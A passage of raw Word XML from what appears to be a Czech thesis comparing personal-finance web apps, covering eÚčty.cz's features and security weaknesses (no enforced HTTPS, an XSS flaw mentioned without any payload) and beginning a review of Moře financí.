        <w:t>í</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deklarují, že j</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>sou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>data v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bezpeč</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>í</w:t>
      </w:r>
      <w:r>
        <w:t>, tak uživatel nikdy nemůže mít jistotu, jestli k</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t> nim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nemá p</w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t xml:space="preserve">řistup </w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t xml:space="preserve">někdo </w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>jiný</w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t>. Stejně tak může mít pochybnosti o tom</w:t>
      </w:r>
      <w:r>
        <w:t>, zda jsou zálohována a</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>mnohých případech je ani nemůže zálohovat sám, protože aplikace nenabízí žádný způsob jejich exportování.</w:t>
      </w:r>
      <w:r w:rsidR="007F635F">
        <w:t xml:space="preserve"> I kdyby byla data </w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t xml:space="preserve">pravidelně </w:t>
      </w:r>
      <w:r w:rsidR="007F635F">
        <w:t xml:space="preserve">zálohována, tak bez možnosti jejich exportu </w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t>je</w:t>
      </w:r>
      <w:r w:rsidR="007F635F">
        <w:t xml:space="preserve"> uživatel </w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t>ztratí</w:t>
      </w:r>
      <w:r w:rsidR="007F635F">
        <w:t xml:space="preserve"> v momentě, kdy se provozovatel rozhodne poskytování služby ukončit nebo </w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t>změní podmínky jejího užívání</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t xml:space="preserve"> tak</w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>že na ně</w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t xml:space="preserve"> u</w:t>
      </w:r>
      <w:r w:rsidR="007F635F">
        <w:t>živatel nebude ochotný přistoupit.</w:t>
      </w:r>
      <w:r w:rsidR="00587D83">
        <w:t xml:space="preserve"> V tomto případě je uživatel plně závislý na </w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t>autorovi aplikace</w:t>
      </w:r>
      <w:r w:rsidR="00587D83">
        <w:t>, na rozdíl od běžných aplikací, které fungují dále</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00587D83">
        <w:t xml:space="preserve"> přestože se jejich autor rozhodne je</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t xml:space="preserve"> již</w:t>
      </w:r>
      <w:r w:rsidR="00587D83">
        <w:t xml:space="preserve"> ne</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>podporovat</w:t>
      </w:r>
      <w:r w:rsidR="00587D83">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F635F" w:rsidRDefault="00587D83" w:rsidP="0068558D">
      <w:r>
        <w:t>Přes výše zmíněné nevýhody je ale obecně příklon k webovým aplikacím trendem. Pro uživatele je tahle forma poskytování software přitažlivější, především kvůli jeho dostupnosti kdykoliv a odkudkoliv.</w:t>
      </w:r>
      <w:r w:rsidR="003F0EC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>Tyto</w:t>
      </w:r>
      <w:r w:rsidR="002C3305">
        <w:t xml:space="preserve"> aplikace také s využitím nových webových technologií svým uživatelům </w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t xml:space="preserve">většinou </w:t>
      </w:r>
      <w:r w:rsidR="002C3305">
        <w:t>nabí</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>zí</w:t>
      </w:r>
      <w:r w:rsidR="002C3305">
        <w:t xml:space="preserve"> atraktivní uživatelské prostředí. Pro vývojáře je výhoda také jasná – nad aplikací mají stále plnou kontrolu, spravují ji </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C3305">
        <w:t>centralizovaně</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C3305">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="002C3305">
        <w:t xml:space="preserve">nemusí </w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>vyvíjet a podporovat</w:t>
      </w:r>
      <w:r w:rsidR="002C3305">
        <w:t xml:space="preserve"> více různých </w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t>mutací aplikace</w:t>
      </w:r>
      <w:r w:rsidR="002C3305">
        <w:t xml:space="preserve">, což je </w:t>
      </w:r>
      <w:r w:rsidR="006E1B7D">
        <w:t xml:space="preserve">právě </w:t>
      </w:r>
      <w:r w:rsidR="002C3305">
        <w:t>největší problém mobilních aplikací. Dále tedy bude tato práce zaměřena jen na webové aplikace</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
        <w:t xml:space="preserve"> určené</w:t>
      </w:r>
      <w:r w:rsidR="002C3305">
        <w:t xml:space="preserve"> pro správu osobních financí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C87C8B" w:rsidRDefault="00C87C8B" w:rsidP="00C87C8B">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc387327793"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Přehled dostupných řešení</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="00C87C8B" w:rsidRDefault="009A09B7" w:rsidP="00C87C8B">
      <w:r>
        <w:t xml:space="preserve">V této kapitole budou stručně představeny vybrané existující webové </w:t>
      </w:r>
      <w:r w:rsidR="0041175A">
        <w:t>služby</w:t>
      </w:r>
      <w:r w:rsidR="00DA0405">
        <w:t xml:space="preserve"> pro správu osobních financí, </w:t>
      </w:r>
      <w:r w:rsidR="0041175A">
        <w:t xml:space="preserve">dvě </w:t>
      </w:r>
      <w:r w:rsidR="00DA0405">
        <w:t>české</w:t>
      </w:r>
      <w:r w:rsidR="0041175A">
        <w:t xml:space="preserve"> a jedna zahraniční</w:t>
      </w:r>
      <w:r w:rsidR="00DA0405">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C87C8B" w:rsidRDefault="00C87C8B" w:rsidP="00C87C8B">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc387327794"/>
      <w:r>
        <w:t>eÚčty.cz</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00DA0405" w:rsidRDefault="00D00DDD" w:rsidP="00DA0405">
      <w:r>
        <w:t xml:space="preserve">Služba eÚčty.cz je </w:t>
      </w:r>
      <w:r w:rsidR="00E84CFD">
        <w:t>nejpoužívanější</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> na českém trhu, přitom je provozována soukromou osobou a dostupná svým uživatelům zdarma. Do veřejného provozu byla uvedena 7.</w:t>
      </w:r>
      <w:r w:rsidR="005B58F8">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="005B58F8">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>2008</w:t>
      </w:r>
      <w:r w:rsidR="005B58F8">
        <w:t xml:space="preserve"> a od té doby je stále vyvíjena. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="24048565"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION 0MYqS4npIoWVXfZV \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[6]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00D1254B" w:rsidRDefault="00D1254B" w:rsidP="00F546F1">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5529343" cy="4525782"/>
            <wp:effectExtent l="19050" t="19050" r="14207" b="27168"/>
            <wp:docPr id="6" name="Obrázek 5" descr="euc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cty.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5536371" cy="4531535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1254B" w:rsidRDefault="00D1254B" w:rsidP="00D1254B">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc387327911"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">. Ukázka </w:t>
      </w:r>
      <w:r w:rsidR="00F546F1">
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>řehledu transakcí v aplikaci eÚčty.cz.</w:t>
      </w:r>
      <w:r w:rsidR="005B0FF2" w:rsidRPr="005B0FF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13468333"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION 0MYqS4npIoWVXfZV \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[6]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="00217893" w:rsidRDefault="00217893" w:rsidP="00217893">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc387327795"/>
      <w:r>
        <w:t>Evidence transakcí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="00F546F1" w:rsidRDefault="00F9714B" w:rsidP="00F546F1">
      <w:r>
        <w:t>Transakce je možné evidovat pod různými účty</w:t>
      </w:r>
      <w:r w:rsidR="008403A8">
        <w:t>, které mohou být</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v různých měnách. Každ</w:t>
      </w:r>
      <w:r w:rsidR="008403A8">
        <w:t>ou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> transakc</w:t>
      </w:r>
      <w:r w:rsidR="008403A8">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008403A8">
        <w:t>lze</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kategorizov</w:t>
      </w:r>
      <w:r w:rsidR="008403A8">
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, přičemž si uživatel </w:t>
      </w:r>
      <w:r w:rsidR="009459C0">
        <w:t>předem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vytv</w:t>
      </w:r>
      <w:r w:rsidR="008403A8">
        <w:t>áří</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vlastní hierarchii kategorií. Vždy ale platí, že jedna transakce může být přiřazena </w:t>
      </w:r>
      <w:r w:rsidR="008403A8">
        <w:t>nejvýše</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jedné kategorii. Systém umožňuje vnitřní převod mezi účty, který se nezapočítává do statistik.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9714B" w:rsidRPr="00F546F1" w:rsidRDefault="00F9714B" w:rsidP="00F546F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Transakce je možné importovat z </w:t>
      </w:r>
      <w:r w:rsidR="00392D8F">
        <w:t xml:space="preserve">CSV souboru, přičemž aplikace podporuje </w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t>výstupní</w:t>
      </w:r>
      <w:r w:rsidR="009459C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00392D8F">
        <w:t xml:space="preserve">formát několika českých bank. Dále lze automatizovat vytváření pravidelných transakcí. Služba není optimalizována pro mobilní telefony, ale nabízí jednoduchou aplikaci pro </w:t>
      </w:r>
      <w:r w:rsidR="009459C0">
        <w:t xml:space="preserve">operační systém </w:t>
      </w:r>
      <w:r w:rsidR="00392D8F">
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidR="00B776E0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00392D8F">
        <w:t xml:space="preserve"> kter</w:t>
      </w:r>
      <w:r w:rsidR="00FD19A1">
        <w:t>ou</w:t>
      </w:r>
      <w:r w:rsidR="00392D8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B776E0">
        <w:t xml:space="preserve">lze využít pro </w:t>
      </w:r>
      <w:r w:rsidR="00392D8F">
        <w:t>zadáv</w:t>
      </w:r>
      <w:r w:rsidR="00B776E0">
        <w:t>ání</w:t>
      </w:r>
      <w:r w:rsidR="00392D8F">
        <w:t xml:space="preserve"> transakc</w:t>
      </w:r>
      <w:r w:rsidR="00B776E0">
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidR="00392D8F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00217893" w:rsidRDefault="00217893" w:rsidP="00217893">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc387327796"/>
      <w:r>
        <w:t>Statistiky a plánování</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="00392D8F" w:rsidRDefault="00392D8F" w:rsidP="00392D8F">
      <w:r>
        <w:t xml:space="preserve">Aplikace umožňuje </w:t>
      </w:r>
      <w:r w:rsidR="00FE7136">
        <w:t xml:space="preserve">zobrazení grafu stavu na jednotlivých účtech v čase a přehled příjmů </w:t>
      </w:r>
      <w:r w:rsidR="00FE7136" w:rsidRPr="006C57FC">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006C57FC">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00FE7136" w:rsidRPr="006C57FC">
        <w:t>výdajů</w:t>
      </w:r>
      <w:r w:rsidR="00FE7136">
        <w:t xml:space="preserve"> v jednotlivých dnech, týdnech, mě</w:t>
      </w:r>
      <w:r w:rsidR="00823988">
        <w:t>sících a letech. Statistiky pro</w:t>
      </w:r>
      <w:r w:rsidR="00FE7136">
        <w:t xml:space="preserve"> kategorie transakcí jsou </w:t>
      </w:r>
      <w:r w:rsidR="009459C0">
        <w:t>na výběr</w:t>
      </w:r>
      <w:r w:rsidR="00FE7136">
        <w:t xml:space="preserve"> měsíční a roční ve formě tabulky. Přehlednější forma grafu podílu kategorií na výdajích je dostupná </w:t>
      </w:r>
      <w:r w:rsidR="009459C0">
        <w:t xml:space="preserve">pouze </w:t>
      </w:r>
      <w:r w:rsidR="00FE7136">
        <w:t>pro kategorie nejvyšší hierarchické úrovně.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE7136" w:rsidRPr="00392D8F" w:rsidRDefault="00FE7136" w:rsidP="00392D8F">
      <w:r>
        <w:t>Plánování je zde zahrnuto ve formě jednoduché kalkulačky, do které lze vložit aktuální stav účtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00217893" w:rsidRDefault="00217893" w:rsidP="00217893">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc387327797"/>
      <w:r>
        <w:t xml:space="preserve">Zabezpečení a </w:t>
      </w:r>
      <w:r w:rsidR="00FE7136">
        <w:t>zálohování</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="00BE6E36" w:rsidRDefault="00E84CFD" w:rsidP="00E84CFD">
      <w:r>
        <w:t>Aplikace umožňuje anonymní registraci při které není vyžadována emailová adresa. Účet je chráněný kombinací uživatelského jména a hesla, přičemž není vyžadována jeho minimální síla nebo délka.</w:t>
      </w:r>
      <w:r w:rsidR="00D02C68">
        <w:t xml:space="preserve"> Aplikace při přihlašování ani při práci v chráněné sekci standardně nepoužívá šifrovaný přenos, čímž se vystavuje možnosti úniku přihlašovacích údajů nebo krádeži relace (viz kapitola </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D02C68">
        <w:instrText xml:space="preserve"> REF _Ref372450248 \w \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>4.2</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D02C68">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00B1154E">
        <w:t xml:space="preserve"> Přitom lze chráněného kanálu přes protokol HTTPS využít (doména má certifikát od uznávané autority), ale neděje se tak automaticky,  ani to autor nezmiňuje v bezpečnostních doporučeních.</w:t>
      </w:r>
      <w:r w:rsidR="00D02C68">
        <w:t xml:space="preserve"> Dále </w:t>
      </w:r>
      <w:r w:rsidR="00B1154E">
        <w:t>jsem objevil zranitelnost k </w:t>
      </w:r>
      <w:r w:rsidR="00D02C68">
        <w:t>XSS útoku</w:t>
      </w:r>
      <w:r w:rsidR="00B1154E">
        <w:t xml:space="preserve"> v popisu transakce (viz kapitola </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B1154E">
        <w:instrText xml:space="preserve"> REF _Ref382677795 \w \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>4.3</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B1154E">
        <w:t xml:space="preserve">), čehož by se dalo zneužít například </w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t>pomocí</w:t>
      </w:r>
      <w:r w:rsidR="00B1154E">
        <w:t xml:space="preserve"> infikování importovaného souboru.</w:t>
      </w:r>
      <w:r w:rsidR="00720853">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00720853" w:rsidRPr="00E84CFD" w:rsidRDefault="00720853" w:rsidP="00E84CFD">
      <w:r>
        <w:t>Data lze</w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>z aplikace exportovat do CSV souboru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE7136" w:rsidRPr="00FE7136" w:rsidRDefault="00FE7136" w:rsidP="00FE7136">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc387327798"/>
      <w:r>
        <w:t>Další funkce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="00CB6807" w:rsidRPr="00FE7136" w:rsidRDefault="00CB6807" w:rsidP="00FE7136">
      <w:r>
        <w:t xml:space="preserve">Speciální funkcí aplikace je možnost vytvoření rodiny, v rámci které lze sdílet účty mezi více uživateli. Dále aplikace umožňuje evidovat tankování automobilu (při tankování se zadává počet natankovaných litrů pohonných hmot a stav tachometru) a dopočítává jeho průměrnou spotřebu a cenu za kilometr. Do této ceny jsou započítány pouze náklady za pohonné hmoty, nikoliv další s ním spojené výdaje. Zajímavou funkcí jsou alarmy, které se aktivují na základě stanoveného data nebo při dosažení určitého počtu kilometrů na stavu </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>tachometru.</w:t>
      </w:r>
      <w:r w:rsidR="00A62230">
        <w:t xml:space="preserve"> Aplikace eÚčty.cz </w:t>
      </w:r>
      <w:r w:rsidR="00EB2B38">
        <w:t>navíc</w:t>
      </w:r>
      <w:r w:rsidR="00A62230">
        <w:t xml:space="preserve"> umožňuje jednoduchou evidenci spotřeby energií </w:t>
      </w:r>
      <w:r w:rsidR="00A62230" w:rsidRPr="00731A91">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00B12819">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00A62230" w:rsidRPr="00731A91">
        <w:t>záruky</w:t>
      </w:r>
      <w:r w:rsidR="00A62230">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731A91">
        <w:t>na</w:t>
      </w:r>
      <w:r w:rsidR="00A62230">
        <w:t xml:space="preserve"> zakoupené zboží.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C87C8B" w:rsidRDefault="00C87C8B" w:rsidP="00C87C8B">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc387327799"/>
      <w:r>
        <w:t>Moře financí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00731A91" w:rsidRDefault="00731A91" w:rsidP="00731A91">
      <w:r>
        <w:t>Další český projekt, který vznikl na začátku roku 2011 a rychle si získal oblibu. Kromě evidence financí nabízí možnost spolupráce s finančními poradci, kdy funguje jako prostředník pro poptávku po určitém bankovním, investičním nebo pojišťovacím produktu. Registrovaní finanční poradci vidí poptávky</w:t>
      </w:r>
      <w:r w:rsidR="00F448AA">
        <w:t xml:space="preserve"> uživatelů</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a mohou na ně reagovat. Uživatel si tedy může prostřednictvím tohoto systému porovnat více různých nabídek. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="24048566"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION ce6t5aPxhBwLKetI \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[7]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00D067F4" w:rsidRDefault="00D067F4" w:rsidP="00D067F4">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5513845" cy="4742107"/>
            <wp:effectExtent l="19050" t="19050" r="10655" b="20393"/>
            <wp:docPr id="7" name="Obrázek 6" descr="More_financ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financi.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5517557" cy="4745300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D067F4" w:rsidRDefault="00D067F4" w:rsidP="00D067F4">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc387327912"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">. Ukázka přehledu transakcí v aplikaci </w:t>
      </w:r>
      <w:r w:rsidR="005B3691">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>oře</w:t>
      </w:r>
      <w:r w:rsidR="005B3691">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>financí.</w:t>
      </w:r>
      <w:r w:rsidR="005B0FF2" w:rsidRPr="005B0FF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13468334"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION ce6t5aPxhBwLKetI \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[7]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="00D067F4" w:rsidRDefault="00D067F4" w:rsidP="00D067F4">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc387327800"/>
      <w:r>
        <w:t>Evidence transakcí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="00D067F4" w:rsidRDefault="00D067F4" w:rsidP="00D067F4">
      <w:r>
        <w:t xml:space="preserve">Transakce je </w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t xml:space="preserve">opět </w:t>
      </w:r>
      <w:r>
        <w:t>možné evidovat pod různými účty</w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t>, ale všechny pouze v českých korunách</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t xml:space="preserve"> K hotovosti je v tomto případě přistupováno jinak, protože není vedena jako </w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">speciální účet. Pro výběr hotovosti z účtu se používá speciální typ transakce, která je ihned evidována jako výdaj. Chybí tedy přehled aktuální hotovosti. Převody mezi vlastními účty nejsou jednoduše dostupné, </w:t>
      </w:r>
      <w:r w:rsidR="00A82A64">
        <w:t xml:space="preserve">například </w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t>v případě převodu financí z běžného účtu na spořící je nutné vytvořit dvě nezávislé transakce ručně (výdej na běžném účtu a příjem na spořícím účtu), čímž dochází ke zkreslení celkových příjmů a výdajů.</w:t>
      </w:r>
      <w:r w:rsidR="00F72E33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t>Každou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> transakc</w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t>lze</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kategorizov</w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, uživatel </w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t xml:space="preserve">si </w:t>
      </w:r>
